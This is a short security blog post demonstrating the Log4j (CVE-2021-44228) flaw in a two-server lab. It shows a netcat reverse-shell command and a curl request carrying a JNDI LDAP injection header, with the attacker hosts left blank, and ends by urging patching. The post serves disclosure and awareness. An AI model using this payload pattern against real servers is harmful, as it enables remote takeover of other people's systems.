Log4j Demonstration

3 min readDec 11, 2021

Researcher: {Alan Ho}

A critical vulnerability for Apache Log4j was discovered and published, it has a huge impact to countless servers.

There are already posts describing the details of the vulnerability (CVE-2021–44228), so we are just going to do a demonstration on how this vulnerability can be manipulated.

We have prepared two servers in AWS, one acts as the vulnerable server which is using exploitable log4j.

vulnerable server
vulnerable server

Another server is running a malicious LDAP server and netcat listener for remote shell.

malicious ldap server
malicious ldap server
listening for remote shell
netcat listener

Since the malicious LDAP server can support base64 encoded commands


We prepare the command:

nc 4444 -e /bin/sh

and base64 encode it

base64 encode the remote shell command

So we have all the servers and command in place, we launch the attack.

curl -H 'X-Api-Version: ${jndi:ldap://}' 
launching the attack
launching the attack

The vulnerable server encountered the errors.

errors the vulnerable server

The malicious LDAP server received the command and the vulnerable server is owned.

command received
received the command
Profit! the server is owned.

Video demonstration:

From the simple demonstration, as long as the malicious ldap server is setup, it is easy to launch the attack and own the server.

ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

Please check your applications and update to the version which has fixed the issue.





VXRL Team is founded by group of enthusiastic security researchers, providing information security services and contribute to the community. https://www.vxrl.hk